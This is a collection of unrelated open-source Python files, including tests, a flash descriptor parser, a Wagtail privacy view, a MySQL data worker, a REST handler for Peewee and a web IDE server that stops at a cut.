apache-2.0
| 10,123 | 0.000296 |
#!/usr/bin/env python3
"""
Test for the Hint identifier (IdentifierHint)
"""
import datetime
import unittest
from base_test import PschedTestBase
from pscheduler.limitprocessor.identifier.hint import *
DATA = {
"hint": "value",
"match": {
"style": "exact",
"match": "testing",
"case-insensitive": False
}
}
HINTS_HIT = {
"value": "testing"
}
HINTS_MISS = {
"value": "not-testing"
}
class TestLimitprocessorIdentifierHint(PschedTestBase):
"""
Test the Identifier
"""
def test_data_is_valid(self):
"""Limit Processor / Identifier Hint / Data Validation"""
self.assertEqual(data_is_valid(DATA), (True, "OK"))
self.assertEqual(data_is_valid({}), (False, "At /: 'hint' is a required property"))
self.assertRaises(ValueError, data_is_valid, 123)
def test_identifier(self):
"""Limit Processor / Identifier Hint / Identifier"""
ident = IdentifierHint(DATA)
self.assertEqual(ident.evaluate(HINTS_HIT), True)
self.assertEqual(ident.evaluate(HINTS_MISS), False)
if __name__ == '__main__':
unittest.main()
|
perfsonar/pscheduler
|
python-pscheduler/pscheduler/tests/limitprocessor_identifier_hint_test.py
|
Python
|
apache-2.0
| 1,127 | 0.002662 |
# -*- coding: utf-8 -*-
class Condition(object):
operator = ''
def __init__(self, operator):
super(Condition, self).__init__()
self.operator = operator
def equal(self, value1, value2):
return (str(value1) == str(value2))
def nequal(self, value1, value2):
return (str(value1) != str(value2))
def gthan(self, value1, value2):
return (float(value1) > float(value2))
def lthan(self, value1, value2):
return (float(value1) < float(value2))
def test(self, value1, value2):
if (self.operator == 'equal'):
return self.equal(value1, value2)
elif(self.operator == 'nequal'):
return self.nequal(value1, value2)
elif(self.operator == 'gthan'):
return self.gthan(value1, value2)
elif(self.operator == 'lthan'):
return self.lthan(value1, value2)
return False
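# Brief usage sketch added for illustration (not part of the original file):
if __name__ == '__main__':
    cond = Condition('gthan')
    print(cond.test(5, 3))    # True: float(5) > float(3)
    print(cond.test('2', 7))  # False
    print(Condition('equal').test(1, '1'))  # True: both sides compared as strings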
|
OpenSpaceProgram/pyOSP
|
library/components/Condition.py
|
Python
|
mit
| 917 | 0.001091 |
"""
Utils module tests.
"""
import shutil
from unittest import TestCase
from microtbs_rl import envs
from microtbs_rl.utils.exploration import LinearDecay
from microtbs_rl.utils.record_policy_execution import record
from microtbs_rl.utils.common_utils import get_test_logger, experiment_dir
from microtbs_rl.algorithms import a2c
logger = get_test_logger()
class ExplorationTests(TestCase):
def test_linear_decay(self):
schedule = LinearDecay(milestones=[])
self.assertAlmostEqual(schedule.at(0), 1)
self.assertAlmostEqual(schedule.at(1), 0)
self.assertAlmostEqual(schedule.at(0.3), 0.7)
self.assertAlmostEqual(schedule.at(0.5), 0.5)
self.assertAlmostEqual(schedule.at(0.7), 0.3)
schedule = LinearDecay(milestones=[(0.5, 0)])
self.assertAlmostEqual(schedule.at(0), 1)
self.assertAlmostEqual(schedule.at(1), 0)
self.assertAlmostEqual(schedule.at(0.25), 0.5)
self.assertAlmostEqual(schedule.at(0.5), 0)
self.assertAlmostEqual(schedule.at(0.7), 0)
schedule = LinearDecay(milestones=[(0.4, 0.2), (0.8, 0.1)])
self.assertAlmostEqual(schedule.at(0), 1)
self.assertAlmostEqual(schedule.at(1), 0)
self.assertAlmostEqual(schedule.at(0.1), 0.8)
self.assertAlmostEqual(schedule.at(0.4), 0.2)
self.assertAlmostEqual(schedule.at(0.6), 0.15)
self.assertAlmostEqual(schedule.at(0.9), 0.05)
class RenderGifTests(TestCase):
def test_render_gif(self):
experiment_name = 'gif_test'
test_env = envs.COLLECT_WITH_TERRAIN_LATEST
a2c_params = a2c.AgentA2C.Params(experiment_name)
a2c_params.train_for_steps = 10
a2c_params.save_every = a2c_params.train_for_steps - 1
self.assertEqual(a2c.train_a2c.train(a2c_params, test_env), 0)
self.assertEqual(record(experiment_name, test_env, save_as_gif=True, num_episodes=1), 0)
shutil.rmtree(experiment_dir(experiment_name))
|
alex-petrenko/hierarchical-rl
|
microtbs_rl/utils/tests/test_utils.py
|
Python
|
mit
| 1,981 | 0.000505 |
"""
ICH flash descriptor
"""
import struct
from raw import RAW
from fd import FD
_SIG = '5AA5F00F'.decode('hex')
_SIG_OFFSET = 0x10
_SIG_SIZE = 0x4
_S_HEADER = struct.Struct('< 16s 4s BBBB BBBB BBBB')
_S_REGION = struct.Struct('< H H')
_REGIONS = [('ich', RAW), ('bios', FD), ('me', RAW), ('gbe', RAW), ('plat', RAW)]
class ICHDesc(object):
def __init__(self, data, start, prefix=''):
self.start = start
self.prefix = prefix
offset = 0
(self.rsvd, self.flvalsig, fcba, nc, frba, nr, fmba, nm, fpsba, isl,
fmsba, psl, _, _) = _S_HEADER.unpack_from(data, offset)
offset += _S_HEADER.size
if self.flvalsig != _SIG:
raise ValueError('bad magic %s' % repr(self.flvalsig))
self.fcba = fcba << 4
self.nc = nc + 1
self.frba = frba << 4
self.nr = nr + 1
self.fmba = fmba << 4
self.nm = nm + 1
self.fpsba = fpsba << 4
self.isl = isl
self.fmsba = fmsba << 4
self.psl = psl
self.blocks = []
self.regions = []
offset = self.frba
region_size = 0
for name, class_ in _REGIONS:
(base, limit) = _S_REGION.unpack_from(data, offset)
offset += _S_REGION.size
if limit >= base:
base = base << 12
limit = (limit << 12) | 0xfff
region_size += limit - base + 1
cur_prefix = '%s%s_' % (prefix, name)
self.blocks.append(class_(data[base:limit + 1], start + base, cur_prefix))
else:
base = None
limit = None
self.blocks.append(None)
self.regions.append((base, limit))
self.size = region_size
def __str__(self):
return '0x%08x+0x%08x: ICH' % (self.start, self.size)
def showinfo(self, ts=' '):
print ts + 'Size: 0x%x' % self.size
print ts + 'Reserved: %s' % (' '.join('%02x' % ord(c) for c in self.rsvd))
print ts + 'FR: 0x%03x %2d' % (self.frba, self.nr)
print ts + 'FC: 0x%03x %2d' % (self.fcba, self.nc)
print ts + 'FPS: 0x%03x %2d' % (self.fpsba, self.isl)
print ts + 'FM: 0x%03x %2d' % (self.fmba, self.nm)
print ts + 'FMS: 0x%03x %2d' % (self.fmsba, self.psl)
print ts + 'Regions:'
for index, (name, _) in enumerate(_REGIONS):
(base, limit) = self.regions[index]
if base is None:
print ts + ' ' + '%4s:-' % name
else:
print ts + ' ' + '%4s:0x%06x:0x%06x' % (name, base, limit)
for block in self.blocks:
if block:
print ts + str(block)
block.showinfo(ts + ' ')
def dump(self):
for block in self.blocks:
if block:
block.dump()
@staticmethod
def check_sig(data, offset=0):
offset += _SIG_OFFSET
return data[offset:offset + _SIG_SIZE] == _SIG
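# Illustrative usage added for clarity ('flash.bin' is a hypothetical dump file,
# not part of the original module):
if __name__ == '__main__':
    with open('flash.bin', 'rb') as f:
        data = f.read()
    if ICHDesc.check_sig(data):
        desc = ICHDesc(data, 0)
        desc.showinfo()
        desc.dump()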
|
fesh0r/romdump
|
ichdesc.py
|
Python
|
mit
| 3,000 | 0.001 |
"""All permissions are defined here.
They are also defined in permissions.zcml.
The two files must be kept in sync.
"""
# Add Permissions:
AddCountry = 'BIKA: Add Country'
AddRegion = 'BIKA: Add Region'
AddCultivar = 'BIKA: Add Cultivar'
AddWineType = 'BIKA: Add Wine type'
AddTransportCondition = 'BIKA: Add Transport condition'
AddStorageCondition = 'BIKA: Add Storage condition'
# Add Permissions for specific types, if required
ADD_CONTENT_PERMISSIONS = {
'Country': AddCountry,
'Region': AddRegion,
'Cultivar': AddCultivar,
'WineType': AddWineType,
'TransportCondition': AddTransportCondition,
'StorageCondition': AddStorageCondition,
}
|
bikalabs/bika.wine
|
bika/wine/permissions.py
|
Python
|
agpl-3.0
| 669 | 0 |
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404
from wagtail.wagtailcore.models import Page, PageViewRestriction
from wagtail.wagtailadmin.forms import PageViewRestrictionForm
from wagtail.wagtailadmin.modal_workflow import render_modal_workflow
def set_privacy(request, page_id):
page = get_object_or_404(Page, id=page_id)
page_perms = page.permissions_for_user(request.user)
if not page_perms.can_set_view_restrictions():
raise PermissionDenied
# fetch restriction records in depth order so that ancestors appear first
restrictions = page.get_view_restrictions().order_by('page__depth')
if restrictions:
restriction = restrictions[0]
restriction_exists_on_ancestor = (restriction.page != page)
else:
restriction = None
restriction_exists_on_ancestor = False
if request.POST:
form = PageViewRestrictionForm(request.POST)
if form.is_valid() and not restriction_exists_on_ancestor:
if form.cleaned_data['restriction_type'] == 'none':
# remove any existing restriction
if restriction:
restriction.delete()
else: # restriction_type = 'password'
if restriction:
restriction.password = form.cleaned_data['password']
restriction.save()
else:
# create a new restriction object
PageViewRestriction.objects.create(
page=page, password=form.cleaned_data['password'])
return render_modal_workflow(
request, None, 'wagtailadmin/page_privacy/set_privacy_done.js', {
'is_public': (form.cleaned_data['restriction_type'] == 'none')
}
)
else: # request is a GET
if not restriction_exists_on_ancestor:
if restriction:
form = PageViewRestrictionForm(initial={
'restriction_type': 'password', 'password': restriction.password
})
else:
# no current view restrictions on this page
form = PageViewRestrictionForm(initial={
'restriction_type': 'none'
})
if restriction_exists_on_ancestor:
# display a message indicating that there is a restriction at ancestor level -
# do not provide the form for setting up new restrictions
return render_modal_workflow(
request, 'wagtailadmin/page_privacy/ancestor_privacy.html', None,
{
'page_with_restriction': restriction.page,
}
)
else:
# no restriction set at ancestor level - can set restrictions here
return render_modal_workflow(
request,
'wagtailadmin/page_privacy/set_privacy.html',
'wagtailadmin/page_privacy/set_privacy.js', {
'page': page,
'form': form,
}
)
|
mephizzle/wagtail
|
wagtail/wagtailadmin/views/page_privacy.py
|
Python
|
bsd-3-clause
| 3,072 | 0.001302 |
#!/usr/bin/python
#======================================================================
#
# Project : hpp_IOStressTest
# File : IOST_WMain_CTRL.py
# Date : Oct 20, 2016
# Author : HuuHoang Nguyen
# Contact : hhnguyen@apm.com
# : hoangnh.hpp@gmail.com
# License : MIT License
# Copyright : 2016
# Description: The hpp_IOStressTest is under the MIT License, a copy of which may be found in LICENSE
#
#======================================================================
import io
import os
import sys
import time
from IOST_Prepare import IOST_Prepare
from IOST_Config import *
from IOST_WRun import *
import gtk
import gtk.glade
class IOST_WMain_CTRL():
"""
"""
def __init__(self, glade_filename, object, builder=None):
"""
"""
if not builder:
self.IOST_CTRL_Builder = gtk.Builder()
self.IOST_CTRL_Builder.add_from_file(glade_filename)
self.IOST_CTRL_Builder.connect_signals(self)
else:
self.IOST_CTRL_Builder = builder
def GetCTRL_Obj(self, object_name):
"""
Get all CTRL objects on WMain window
"""
self.ConfigObjs[object_name]["SaveConfig_B_Obj"] = self.IOST_CTRL_Builder.get_object(self.ConfigObjs[object_name]["SaveConfig_B_Name"])
self.ConfigObjs[object_name]["Cancel_B_Obj"] = self.IOST_CTRL_Builder.get_object(self.ConfigObjs[object_name]["Cancel_B_Name"])
self.ConfigObjs[object_name]["Run_B_Obj"] = self.IOST_CTRL_Builder.get_object(self.ConfigObjs[object_name]["Run_B_Obj"])
#----------------------------------------------------------------------
# Run Button
#----------------------------------------------------------------------
def on_IOST_Wmain_Config_Save_B_clicked(self, object, data=None):
"Control to Save Condfig button"
# --------------------
# Cancel Button
# --------------------
def on_IOST_Wmain_Config_CTRL_Cancel_B_clicked(self, object, data=None):
"Control to Cancel button"
#----------------------------------------------------------------------
def on_IOST_Wmain_Config_CTRL_Run_B_clicked(self, object, data=None):
"Control to Run button"
IOST_WRun.__init__(self, self.IOST_WMain_GladeFile,
self.ConfigObjs["IOST_WRun"]["WRun_Name"],
None)
self.ConfigObjs["IOST_WMain"]["WMain_Obj"].hide()
#
|
HPPTECH/hpp_IOSTressTest
|
Refer/IOST_OLD_SRC/IOST_0.10/IOST_WMain_CTRL.py
|
Python
|
mit
| 2,475 | 0.006061 |
"""Support for Peewee ORM (https://github.com/coleifer/peewee)."""
from __future__ import annotations
import typing as t
import marshmallow as ma
import muffin
import peewee as pw
from apispec.ext.marshmallow import MarshmallowPlugin
from marshmallow_peewee import ForeignKey, ModelSchema
from muffin.typing import JSONType
from peewee_aio import Manager, Model
from muffin_rest.errors import APIError
from muffin_rest.handler import RESTBase, RESTOptions
from muffin_rest.peewee.filters import PWFilters
from muffin_rest.peewee.openapi import PeeweeOpenAPIMixin
from muffin_rest.peewee.sorting import PWSorting
# XXX: Patch apispec.MarshmallowPlugin to support ForeignKeyField
MarshmallowPlugin.Converter.field_mapping[ForeignKey] = ("integer", None)
class PWRESTOptions(RESTOptions):
"""Support Peewee."""
model: t.Type[pw.Model]
model_pk: t.Optional[pw.Field] = None
manager: Manager
# Base filters class
filters_cls: t.Type[PWFilters] = PWFilters
# Base sorting class
sorting_cls: t.Type[PWSorting] = PWSorting
Schema: t.Type[ModelSchema]
# Schema auto generation params
schema_base: t.Type[ModelSchema] = ModelSchema
# Recursive delete
delete_recursive = False
base_property: str = "model"
def setup(self, cls):
"""Prepare meta options."""
self.name = self.name or self.model._meta.table_name.lower()
self.model_pk = self.model_pk or self.model._meta.primary_key
manager = getattr(self, "manager", getattr(self.model, "_manager", None))
if manager is None:
raise RuntimeError("Peewee-AIO ORM Manager is not available")
self.manager = manager
super().setup(cls)
def setup_schema_meta(self, _):
"""Prepare a schema."""
return type(
"Meta",
(object,),
dict(
{"unknown": self.schema_unknown, "model": self.model},
**self.schema_meta,
),
)
class PWRESTBase(RESTBase):
"""Support Peeweee."""
collection: pw.Query
resource: pw.Model
meta: PWRESTOptions
meta_class: t.Type[PWRESTOptions] = PWRESTOptions
async def prepare_collection(self, _: muffin.Request) -> pw.Query:
"""Initialize Peeewee QuerySet for a binded to the resource model."""
return self.meta.model.select()
async def prepare_resource(self, request: muffin.Request) -> t.Optional[pw.Model]:
"""Load a resource."""
pk = request["path_params"].get(self.meta.name_id)
if not pk:
return None
meta = self.meta
resource = await meta.manager.fetchone(
self.collection.where(meta.model_pk == pk)
)
if resource is None:
raise APIError.NOT_FOUND("Resource not found")
return resource
async def paginate(
self, _: muffin.Request, *, limit: int = 0, offset: int = 0
) -> t.Tuple[pw.Query, int]:
"""Paginate the collection."""
cqs: pw.Select = self.collection.order_by() # type: ignore
if cqs._group_by:
cqs._returning = cqs._group_by
count = await self.meta.manager.count(cqs)
return self.collection.offset(offset).limit(limit), count # type: ignore
async def get(self, request, *, resource=None) -> JSONType:
"""Get resource or collection of resources."""
if resource is not None and resource != "":
return await self.dump(request, resource, many=False)
resources = await self.meta.manager.fetchall(self.collection)
return await self.dump(request, resources, many=True)
async def save(self, _: muffin.Request, resource: pw.Model) -> pw.Model:
"""Save the given resource."""
meta = self.meta
if issubclass(meta.model, Model):
await resource.save()
else:
await meta.manager.save(resource)
return resource
async def remove(self, request: muffin.Request, *, resource: pw.Model = None):
"""Remove the given resource."""
meta = self.meta
if resource:
resources = [resource]
else:
data = await request.data()
if not data:
return
model_pk = t.cast(pw.Field, meta.model_pk)
resources = await meta.manager.fetchall(
self.collection.where(model_pk << data)
)
if not resources:
raise APIError.NOT_FOUND()
delete_instance = meta.manager.delete_instance
if issubclass(meta.model, Model):
delete_instance = lambda m: m.delete_instance(recursive=meta.delete_recursive) # type: ignore # noqa
for res in resources:
await delete_instance(res)
delete = remove # noqa
async def get_schema(
self, request: muffin.Request, resource=None, **_
) -> ma.Schema:
"""Initialize marshmallow schema for serialization/deserialization."""
return self.meta.Schema(
instance=resource,
only=request.url.query.get("schema_only"),
exclude=request.url.query.get("schema_exclude", ()),
)
class PWRESTHandler(PWRESTBase, PeeweeOpenAPIMixin): # type: ignore
"""Support peewee."""
pass
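# Hedged illustration (not part of this module): a concrete endpoint is typically
# defined by subclassing PWRESTHandler and binding it to a peewee-aio model via
# Meta; `Resource` below is a hypothetical peewee_aio.Model with a bound Manager.
#
#     class ResourceHandler(PWRESTHandler):
#         class Meta:
#             model = Resource
#
# PWRESTOptions then derives the endpoint name, primary key and schema from the model.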
|
klen/muffin-rest
|
muffin_rest/peewee/__init__.py
|
Python
|
mit
| 5,302 | 0.000943 |
"""
Chaotic series
"""
from plotting import plot_iteration
from generic_iteration import generic_iteration
class Iterator:
"""Iterator object to compute iterative processes or magnitudes.
"""
    def __init__(self, iter_f, stop_f):
"""Instantiation of the iteration.
Parameters
----------
iter_f: function
the iteration function.
stop_f: function
the conditions to stop the iteration.
"""
self.iter_f, self.stop_f = iter_f, stop_f
def iterate_sequence(self, p0):
"""Comput the iteration from the initial point given.
Parameters
----------
p0: optional
initial point to start the iteration.
Returns
-------
sequence: np.ndarray
the sequence information.
"""
sequence = generic_iteration(p0, self.iter_f, self.stop_f)
return sequence
def plot_sequence(self, sequence):
"""Plot a 1d sequence.
Parameters
----------
sequence: np.ndarray
the sequence information.
Returns
-------
fig: matplotlib.pyplot.figure
the figure object which contains the plot.
"""
fig = plot_iteration(sequence)
return fig
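# Illustrative sketch added for clarity (not in the original module). The exact
# stop_f contract depends on generic_iteration, which is defined elsewhere; with
# the logistic map in its chaotic regime, usage would look roughly like:
#
#   it = Iterator(lambda x: 3.9 * x * (1 - x),  # iter_f: logistic map
#                 stop_f)                        # e.g. stop after N iterations
#   seq = it.iterate_sequence(0.5)
#   fig = it.plot_sequence(seq)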
|
tgquintela/ChaosFunctions
|
ChaosFunctions/chaotic_series.py
|
Python
|
mit
| 1,312 | 0 |
# encoding: utf-8
__import__('pkg_resources').declare_namespace(__name__)
|
NicoVarg99/daf-recipes
|
ckan/ckan/ckan/ckanext/stats/__init__.py
|
Python
|
gpl-3.0
| 75 | 0 |
# -*- coding: utf-8 -*-
from gluon import *
from s3 import *
from s3layouts import *
try:
from .layouts import *
except ImportError:
pass
import s3menus as default
# =============================================================================
class S3MainMenu(default.S3MainMenu):
"""
Custom Main Menu
"""
# -------------------------------------------------------------------------
@classmethod
def menu(cls):
main_menu = MM()(
# Modules-menu, align-left
cls.menu_modules(),
# Service menus, align-right
# Note: always define right-hand items in reverse order!
cls.menu_lang(right=True),
#cls.menu_gis(right=True),
cls.menu_auth(right=True),
cls.menu_admin(right=True),
cls.menu_help(right=True),
)
return main_menu
# -------------------------------------------------------------------------
@classmethod
def menu_modules(cls):
""" Custom Modules Menu """
person_id = current.auth.s3_logged_in_person()
if person_id:
dashboard = MM("Dashboard", c="pr", f="person",
args=[person_id, "dashboard"])
else:
dashboard = None
return [dashboard,
MM("Map", c="gis", f="index"),
MM("Incidents", c="event", f="incident", m="browse"),
MM("Events", c="event", f="event", m="browse"),
MM("Resources", c="pr", f="group", m="browse"),
MM("Groups", c="pr", f="forum", m="browse"),
MM("More", link=False)(
MM("Fire Stations", c="fire", f="station"),
MM("Police Stations", c="police", f="station"),
),
]
# -------------------------------------------------------------------------
@classmethod
def menu_help(cls, **attr):
""" Custom Help Menu """
menu_help = MM("About", f="about", **attr)
return menu_help
# -------------------------------------------------------------------------
@classmethod
def menu_auth(cls, **attr):
""" Auth Menu """
auth = current.auth
logged_in = auth.is_logged_in()
if not logged_in:
request = current.request
login_next = URL(args=request.args, vars=request.vars)
if request.controller == "default" and \
request.function == "user" and \
"_next" in request.get_vars:
login_next = request.get_vars["_next"]
self_registration = current.deployment_settings.get_security_registration_visible()
if self_registration == "index":
register = MM("Register", c="default", f="index", m="register",
vars=dict(_next=login_next),
check=self_registration)
else:
register = MM("Register", m="register",
vars=dict(_next=login_next),
check=self_registration)
menu_auth = MM("Login", c="default", f="user", m="login",
_id="auth_menu_login",
vars=dict(_next=login_next), **attr)(
MM("Login", m="login",
vars=dict(_next=login_next)),
register,
MM("Lost Password", m="retrieve_password")
)
else:
# Logged-in
menu_auth = MM(auth.user.email, c="default", f="user",
translate=False, link=False, _id="auth_menu_email",
**attr)(
MM("User Profile", m="profile"),
#MM("Personal Data", c="default", f="person", m="update"),
#MM("Contact Details", c="pr", f="person",
# args="contact",
# vars={"person.pe_id" : auth.user.pe_id}),
#MM("Subscriptions", c="pr", f="person",
# args="pe_subscription",
# vars={"person.pe_id" : auth.user.pe_id}),
MM("Change Password", m="change_password"),
MM("Logout", m="logout", _id="auth_menu_logout"),
#SEP(),
#MM({"name": current.T("Rapid Data Entry"),
# "id": "rapid_toggle",
# "value": current.session.s3.rapid_data_entry is True},
# f="rapid"),
)
return menu_auth
# -------------------------------------------------------------------------
@classmethod
def menu_lang(cls, **attr):
""" Language Selector """
s3 = current.response.s3
menu_lang = ML("Language", **attr)
for language in s3.l10n_languages.items():
code, name = language
menu_lang(
ML(name, translate=False, lang_code=code, lang_name=name)
)
return menu_lang
# =============================================================================
class S3OptionsMenu(default.S3OptionsMenu):
""" Custom Application Side Menu """
# -------------------------------------------------------------------------
def admin(self):
""" ADMIN menu """
ADMIN = current.session.s3.system_roles.ADMIN
settings_messaging = self.settings_messaging()
#translate = current.deployment_settings.has_module("translate")
# NB: Do not specify a controller for the main menu to allow
# re-use of this menu by other controllers
return M(restrict=[ADMIN])(
M("Settings", c="admin", f="setting")(
settings_messaging,
),
M("User Management", c="admin", f="user")(
M("Create User", m="create"),
M("List All Users"),
M("Import Users", m="import"),
M("List All Roles", f="role"),
M("List All Organization Approvers & Whitelists", f="organisation"),
#M("Roles", f="group"),
#M("Membership", f="membership"),
),
M("Database", c="appadmin", f="index")(
M("Raw Database access", c="appadmin", f="index"),
),
M("Error Tickets", c="admin", f="errors"),
M("Synchronization", c="sync", f="index")(
M("Settings", f="config", args=[1], m="update"),
M("Repositories", f="repository"),
M("Log", f="log"),
),
M("Taxonomies")(
#M("Event Types", c="event", f="event_type"),
M("Incident Types", c="event", f="incident_type"),
M("Organization Types", c="org", f="organisation_type"),
M("Update Statuses", c="cms", f="status"),
),
#M("Edit Application", a="admin", c="default", f="design",
#args=[request.application]),
#M("Translation", c="admin", f="translate", check=translate)(
# M("Select Modules for translation", c="admin", f="translate",
# m="create", vars=dict(opt="1")),
# M("Upload translated files", c="admin", f="translate",
# m="create", vars=dict(opt="2")),
# M("View Translation Percentage", c="admin", f="translate",
# m="create", vars=dict(opt="3")),
# M("Add strings manually", c="admin", f="translate",
# m="create", vars=dict(opt="4"))
#),
#M("View Test Result Reports", c="admin", f="result"),
#M("Portable App", c="admin", f="portable")
)
# END =========================================================================
|
flavour/eden
|
modules/templates/historic/WACOP/menus.py
|
Python
|
mit
| 8,445 | 0.003671 |
#!/usr/bin/env python
import os
import random
import types
import uuid
import msgpack
import MySQLdb
#from MySQLdb.cursors import DictCursor
#from MySQLdb.cursors import Cursor
from warnings import filterwarnings
from cocaine.worker import Worker
from cocaine.logging import Logger
#Suppressing warnings
filterwarnings('ignore', category=MySQLdb.Warning)
log = Logger()
class MySqlDG(object):
def __init__(self, **config):
self.logger = Logger()
self.place = None
self.tablename = ''
try:
# port = config.get('local_db_port', 3306)
unix_socket = config.get('MysqlSocket',
"/var/run/mysqld/mysqld.sock")
self.dbname = config.get('local_db_name', 'COMBAINE')
self.db = MySQLdb.connect(unix_socket=unix_socket, user='root', )
self.cursor = self.db.cursor()
self.cursor.execute('CREATE DATABASE IF NOT EXISTS %s' % self.dbname)
self.db.commit()
self.db.select_db(self.dbname)
except Exception as err:
self.logger.error('Error in init MySQLdb %s' % err)
raise Exception
def putData(self, data, tablename):
try:
tablename = tablename.replace('.', '_').replace('-', '_').replace('+', '_')
line = None
fname = '/dev/shm/%s-%i' % ('COMBAINE', random.randint(0, 65535))
with open(fname, 'w') as table_file:
for line in data:
table_file.write('GOPA'.join([str(x) for x in line.values()]) + '\n')
table_file.close()
if not line:
self.logger.info("Data for mysql is missed")
os.remove(table_file.name)
return False
self.logger.debug('Data written to a temporary file %s, size: %d bytes'
% (table_file.name, os.lstat(table_file.name).st_size))
if not self._preparePlace(line):
self.logger.error('Unsupported field types. Look at preparePlace()')
return False
self.cursor.execute('DROP TABLE IF EXISTS %s' % tablename)
query = "CREATE TABLE IF NOT EXISTS %(tablename)s %(struct)s ENGINE = MEMORY DATA DIRECTORY='/dev/shm/'" % {'tablename': tablename,
'struct': self.place}
self.cursor.execute(query)
self.db.commit()
query = "LOAD DATA INFILE '%(filename)s' INTO TABLE %(tablename)s FIELDS TERMINATED BY 'GOPA'" % {'filename': table_file.name,
'tablename': tablename}
self.cursor.execute(query)
self.db.commit()
if os.path.isfile(table_file.name):
os.remove(table_file.name)
except Exception as err:
self.logger.error('Error in putData %s' % err)
if os.path.isfile(table_file.name):
os.remove(table_file.name)
return False
else:
self.tablename = tablename
return True
def _preparePlace(self, example):
ftypes = {types.IntType: "INT",
types.UnicodeType: "VARCHAR(200)",
types.StringType: "VARCHAR(200)",
types.FloatType: "FLOAT"}
try:
self.place = '( %s )' % ','.join([" %s %s" % (field_name,
ftypes[type(field_type)])
for field_name, field_type in example.items()])
except Exception as err:
self.logger.error('Error in preparePlace() %s' % err)
self.place = None
return False
else:
return True
def perfomCustomQuery(self, query_string):
self.logger.debug("Execute query: %s" % query_string)
self.cursor.execute(query_string)
_ret = self.cursor.fetchall()
self.db.commit()
return _ret
def __del__(self):
if self.db:
self.cursor.close()
self.db.commit()
self.db.close()
def put(request, response):
raw = yield request.read()
config, data = msgpack.unpackb(raw)
tablename = str(uuid.uuid4()).replace("-", "")[:24]
log.info(str(config))
log.info("Put data into %s" % tablename)
try:
m = MySqlDG(**config)
m.putData(data, tablename)
except Exception as err:
response.error(-100, str(err))
else:
response.write(tablename)
response.close()
def drop(request, response):
raw = yield request.read()
config, tablename = msgpack.unpackb(raw)
try:
m = MySqlDG(**config)
drop_query = "DROP TABLE IF EXISTS %s" % tablename
log.info(drop_query)
m.perfomCustomQuery(drop_query)
except Exception as err:
response.error(-100, str(err))
else:
response.write("ok")
response.close()
if __name__ == "__main__":
W = Worker()
W.run({"put": put,
"drop": drop})
|
kartvep/Combaine
|
plugins/datagrid/mysqldg.py
|
Python
|
lgpl-3.0
| 5,281 | 0.00303 |
#!/usr/bin/python
# encoding: utf-8
# -*- coding: utf8 -*-
from gevent import monkey
monkey.patch_all()
hosts = [
    'https://api.weixin.qq.com/cgi-bin/get_current_selfmenu_info', # common domain for the Official Accounts Platform API
    'https://qyapi.weixin.qq.com/cgi-bin/menu/get', # enterprise (WeChat Work) API domain
    'https://login.weixin.qq.com/', # WeChat web client
    'https://wx2.qq.com/', # WeChat web client
    'http://weixin.qq.com/' # WeChat homepage
]
def request_http(url):
print('GET: %s' % url)
import requests
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/51.0.2704.106 Safari/537.36",
'cache-control': "no-cache",
}
response = requests.request("GET", url, headers=headers)
print len(response.text), "retrieved from %s " % url
gevent.sleep(0.5)
print response.headers, "from %s " % url
if __name__ == '__main__':
import gevent
gevent.joinall([gevent.spawn(request_http, host) for host in hosts])
|
WZQ1397/automatic-repo
|
python/checkWeixinApi.py
|
Python
|
lgpl-3.0
| 1,022 | 0.002075 |
# -*- coding: utf-8 -*-
"""
{{ cookiecutter.app_name }}.api.v1
{{ "~" * (cookiecutter.app_name ~ ".api.v1")|count }}
:author: {{ cookiecutter.author }}
:copyright: © {{ cookiecutter.copyright }}
:license: {{ cookiecutter.license }}, see LICENSE for more details.
templated from https://github.com/ryanolson/cookiecutter-webapp
"""
from .todos import TodosAPI, TodosResource, TodoResource
def create_blueprint(name=None, url_prefix=None, subdomain=None):
"""Register API endpoints on a Flask :class:`Blueprint`."""
from flask import Blueprint
# Determine blueprint name
name = name or __name__.split('.')[-1]
url_prefix = url_prefix or "/{0}".format(name)
if subdomain:
name = "{0}_{1}".format(subdomain, name)
# Create blueprint
bp = Blueprint(name, __name__, url_prefix=url_prefix, subdomain=subdomain)
# Register API endpoints
TodosAPI.register(bp)
return bp
|
ryanolson/cookiecutter-webapp
|
{{cookiecutter.app_name}}/{{cookiecutter.app_name}}/api/v1/__init__.py
|
Python
|
mit
| 946 | 0.001058 |
# coding: utf-8
import os
import sys
import logging
import webbrowser
import socket
import time
import json
import traceback
import cv2
import tornado.ioloop
import tornado.web
import tornado.websocket
from tornado.concurrent import run_on_executor
from concurrent.futures import ThreadPoolExecutor # `pip install futures` for python2
import atx
from atx import logutils
from atx import imutils
from atx import base
__dir__ = os.path.dirname(os.path.abspath(__file__))
log = logutils.getLogger("webide", level=logging.DEBUG)
log.setLevel(logging.DEBUG)
IMAGE_PATH = ['.', 'imgs', 'images']
workdir = '.'
device = None
atx_settings = {}
def read_file(filename, default=''):
if not os.path.isfile(filename):
return default
with open(filename, 'rb') as f:
return f.read()
def write_file(filename, content):
with open(filename, 'w') as f:
f.write(content.encode('utf-8'))
def get_valid_port():
for port in range(10010, 10100):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('127.0.0.1', port))
sock.close()
if result != 0:
return port
raise SystemError("Can not find a unused port, amazing!")
class FakeStdout(object):
def __init__(self, fn=sys.stdout.write):
self._fn = fn
def write(self, s):
self._fn(s)
def flush(self):
pass
class ImageHandler(tornado.web.RequestHandler):
def get(self):
imgs = base.list_images(path=IMAGE_PATH)
images = []
for name in imgs:
realpath = name.replace('\\', '/') # fix for windows
name = os.path.basename(name).split('@')[0]
images.append([name, realpath])
self.write({
'images': images,
'baseURL': self.request.protocol + '://' + self.request.host+'/static_imgs/'
})
class MainHandler(tornado.web.RequestHandler):
def get(self):
imgs = base.list_images(path=IMAGE_PATH)
imgs = [(os.path.basename(name), name) for name in imgs]
self.render('index.html', images=imgs)
def post(self):
print self.get_argument('xml_text')
self.write("Good")
class DebugWebSocket(tornado.websocket.WebSocketHandler):
executor = ThreadPoolExecutor(max_workers=1)
def open(self):
log.info("WebSocket connected")
self._run = False
def _highlight_block(self, id):
self.write_message({'type': 'highlight', 'id': id})
if not self._run:
raise RuntimeError("stopped")
else:
time.sleep(.1)
def write_console(self, s):
self.write_message({'type': 'console', 'output': s})
def run_blockly(self, code):
filename = '__tmp.py'
fake_sysout = FakeStdout(self.write_console)
__sysout = sys.stdout
sys.stdout = fake_sysout # TODOs
